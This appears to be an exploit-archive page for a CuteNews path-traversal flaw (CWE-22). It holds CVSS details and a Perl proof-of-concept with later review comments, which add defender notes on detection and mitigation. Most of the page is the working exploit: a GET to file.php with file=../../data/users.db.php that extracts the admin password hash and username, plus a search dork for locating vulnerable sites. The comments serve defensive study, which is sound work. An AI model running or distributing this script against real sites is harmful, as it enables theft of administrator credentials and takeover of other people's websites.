CuteNews Arbitrary File Download (All Versions)

2008.01.05
Credit: Pr0metheuS
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 5.8/10
Impact Subscore: 4.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

!/usr/bin/perl
# NOTE(review): the interpreter line above is reproduced exactly as printed
# on the page; in this form it is not valid Perl.
#
# What this proof-of-concept does (as shown by the code below):
#   * Takes two arguments, a site base URL and a path, and issues an HTTP GET
#     to <SITE><PATH>/file.php with the `file` query parameter set to
#     "../../data/users.db.php".
#   * The "../" segments are the CWE-22 path traversal the advisory refers
#     to: file.php is asked for a file outside the directory it is meant to
#     serve from.
#   * Searches the response body for a 32-hex-digit string and for the
#     pipe-delimited field that precedes it, and prints both.
#
# Scope: the author's header below names CuteNews 2.6 (module file.php),
# while the page title claims all versions. The page does not show which
# releases were actually tested.
#
# Defender notes:
#   * Detection: look in web server access logs for requests to file.php
#     whose `file` parameter contains "../" sequences or ends in
#     users.db.php. The "Mozilla/8.0" agent string is set on an object that
#     is discarded before the request is made, so the request carries
#     LWP's default User-Agent (libwww-perl/<version>).
#   * Mitigation: file.php should resolve the requested name to a canonical
#     path and refuse anything that falls outside the intended download
#     directory. The data/ directory should not be reachable through the
#     application or the web server.
#   * Response: if such a request returned the users file, treat every
#     credential stored in it as exposed.
#
#Found by Pr0metheuS
#Coded by Pr0metheuS
#CuteNews 2.6 ( module file.php )
#Gr33tz-TeaM
#Dork : inurl:/cutenews/file.php
use LWP::UserAgent;

# Print the banner and usage text unless exactly two arguments were given.
if(@ARGV!=2){
    print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
    print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";
    print "-=-=-= By Pr0metheuS -=-=-=-=-\n";
    print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";
    print "-=-=-= Gr33tz To : -=-=-=-=-\n";
    print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";
    print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
    print "USAGE : perl $0 <SITE> <PATH>\n";
    exit;
}

# No `use strict` / `use warnings`; $SITE, $PATH and most later variables are
# undeclared package globals. Both arguments are used unvalidated in the URL.
($SITE,$PATH)=@ARGV;

# The first user agent object (indirect-object `new` syntax) gets its agent
# string set, then $ua is overwritten with a fresh object. The custom agent
# string therefore never reaches the wire.
$ua = new LWP::UserAgent;
$ua->agent("Mozilla/8.0");
$ua = LWP::UserAgent->new;

# The traversal request: `file` points two directories up and into
# data/users.db.php.
my $req = HTTP::Request->new(GET => "$SITE$PATH/file.php?file=../../data/users.db.php");
$req->header('Accept' => 'text/html');
$res = $ua->request($req);
$con = $res->content;

if($res->is_success){
    # First run of 32 hex characters anywhere in the body. That is the length
    # of an MD5 digest, and the script labels it "Admin Pass" - presumably the
    # stored password hash; the file format is not shown on the page.
    if($con =~ /([0-9a-fA-F]{32})/){
        $hash = $1;
        print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
        print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";
        print "-=-=-= By Pr0metheuS -=-=-=-=-\n";
        print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";
        print "-=-=-= Gr33tz To : -=-=-=-=-\n";
        print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";
        print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
        print "_____________________________\n";
        print "[+] Exploit Work!\n";
        print "[+] Admin Pass : ".$hash."\n";

        # Repeats the identical GET with a second user agent object (same
        # set-then-overwrite pattern as above), so a single run produces two
        # matching entries in the access log.
        $ua2 = new LWP::UserAgent;
        $ua2->agent("Mozilla/8.0");
        $ua2 = LWP::UserAgent->new;
        my $req2 = HTTP::Request->new(GET => "$SITE$PATH/file.php?file=../../data/users.db.php");
        $req2->header('Accept' => 'text/html');
        $res2 = $ua2->request($req2);
        $con2 = $res2->content;

        # Looks for "|<one char>|<field>|<hash>|" and prints <field> as the
        # username. Presumably this mirrors the record layout of
        # users.db.php - TODO confirm against the application.
        if($con2 =~ /\|.\|(.*)\|$hash\|/){
            $user = $1;
            print "[+] Admin Username : ".$user."\n";
        }
    }
    else{
        # Reached when the request succeeded but the body held no 32-hex
        # string. The "Connect failed" wording is the author's.
        print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
        print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";
        print "-=-=-= By Pr0metheuS -=-=-=-=-\n";
        print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";
        print "-=-=-= Gr33tz To : -=-=-=-=-\n";
        print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";
        print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
        print "_____________________________\n";
        print "[+] Connect failed..\n";
    }
}
else{
    # Reached when the HTTP request itself was not successful
    # (is_success false). The "Exploit Failed" wording is the author's.
    print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
    print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";
    print "-=-=-= By Pr0metheuS -=-=-=-=-\n";
    print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";
    print "-=-=-= Gr33tz To : -=-=-=-=-\n";
    print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";
    print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
    print "_____________________________\n";
    print "[+] Exploit Failed..\n";
}

